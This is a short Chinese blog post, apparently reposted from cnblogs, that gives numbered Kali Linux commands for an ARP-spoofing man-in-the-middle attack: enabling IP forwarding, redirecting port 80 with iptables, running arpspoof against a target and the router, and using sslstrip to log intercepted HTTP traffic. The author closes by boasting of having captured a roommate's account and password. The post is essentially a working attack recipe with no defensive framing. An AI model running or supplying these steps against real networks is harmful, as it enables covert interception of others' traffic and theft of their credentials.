首页 > 其他 > 详细

Kali基于路由器的ARP欺骗转发机制

时间:2014-04-10 21:19:55      阅读:723      评论:0      收藏:0      [点我收藏+]
这里假设 RouteIP:192.168.1.1 OwnIP:192.168.1.100  TargetIP:192.168.1.101

1.echo 1> /proc/sys/net/ipv4/ip_forward 

2.cat /proc/sys/net/ipv4/ip_forward 如果显示是1 第一步可以不做
3.iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
4.arpspoof -i eth0 (ifconfig -a 查看所选用网络模块,eth0 有线 )-t (Target IP)  (Route IP) 
Eg:arpspoof -i eth0 -t 192.168.1.101 192.168.1.1  实现中断
5arpspoof -i eth0 -t (Route IP) (Own IP)
Eg:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
6.sslstrip -p -l 10000 (实现转发机制)
7.tail -f sslstrip.log (读取转发记录)
 
现在就可以看到客户端的信息了,http的一般都能截取到,https的就没戏了.呵呵成功获取了室友的账号和密码~~~

Kali基于路由器的ARP欺骗转发机制,布布扣,bubuko.com

Kali基于路由器的ARP欺骗转发机制

原文:http://www.cnblogs.com/i0ject/p/3656523.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!